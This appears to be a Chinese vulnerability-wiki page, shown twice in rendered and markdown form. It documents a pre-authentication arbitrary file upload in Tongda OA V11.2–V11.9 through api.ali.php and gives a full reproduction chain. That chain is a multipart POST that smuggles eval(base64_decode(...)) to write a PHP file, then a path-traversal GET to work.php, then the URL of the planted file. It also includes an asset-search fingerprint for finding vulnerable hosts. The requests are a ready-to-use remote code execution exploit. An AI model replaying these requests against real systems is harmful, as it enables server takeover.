fofamini-wiki

登录白背景

源码

通达OA api.ali存在前台任意文件上传漏洞

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。通达OA api.ali.php存在任意文件上传漏洞，攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

二、影响版本

通达OA V11.2-通达OA V11.9

三、资产测绘

hunterapp.name="通达 OA"
特征

四、漏洞复现

发起请求，其中参数aZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIGVjaG8gdnVsbl90ZXN0Oz8+Jyk7base64解码为file_put_contents('../../fb6790f4.php','<?php echo vuln_test;?>');，向页面输出vuln_test字符

POST /mobile/api/api.ali.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.31.164
Content-Length: 402

--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream

{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIGVjaG8gdnVsbl90ZXN0Oz8+Jyk7","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--

发起get请求写入文件，其中2309代表着其创建日期，23年9月，上传文件成功后，即可出现"+ok"提示

GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/2309/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4  HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.31.164

上传文件位置，成功输出vuln_test字符

http://xx.xx.xx.xx/fb6790f4.php

原文: https://www.yuque.com/xiaokp7/ocvun2/zl5zhu1wm2qu5c06

# 通达OA api.ali存在前台任意文件上传漏洞

# 一、漏洞简介
通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。通达OA api.ali.php存在任意文件上传漏洞，攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

# 二、影响版本

- 通达OA V11.2-通达OA V11.9

# 三、资产测绘

- hunter`app.name="通达 OA"`
- 特征

![image.png](./img/JRLOYx6AxgrZUdY7/1694870829657-63e4515a-b222-49fe-a8a1-54bcc9cc1af3-265683.png)

# 四、漏洞复现

1. 发起请求，其中参数a`ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIGVjaG8gdnVsbl90ZXN0Oz8+Jyk7`base64解码为`file_put_contents('../../fb6790f4.php','<?php echo vuln_test;?>');`，向页面输出`vuln_test`字符
```java
POST /mobile/api/api.ali.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.31.164
Content-Length: 402

--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream

{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIGVjaG8gdnVsbl90ZXN0Oz8+Jyk7","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--
```
![image.png](./img/JRLOYx6AxgrZUdY7/1694885395304-497516d2-7baf-45c6-83ac-7e187e1d8af6-470762.png)

2. 发起get请求写入文件，其中`2309`代表着其创建日期，23年9月，上传文件成功后，即可出现"+ok"提示
```java
GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/2309/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4  HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.31.164
```
![image.png](./img/JRLOYx6AxgrZUdY7/1694885198382-fce00a79-0698-432a-8c3e-9c02defe8a9e-089837.png)

3. 上传文件位置，成功输出`vuln_test`字符
```java
http://xx.xx.xx.xx/fb6790f4.php
```
![image.png](./img/JRLOYx6AxgrZUdY7/1694885468079-580b607b-94aa-4431-a10b-395fd8d917bd-934222.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zl5zhu1wm2qu5c06>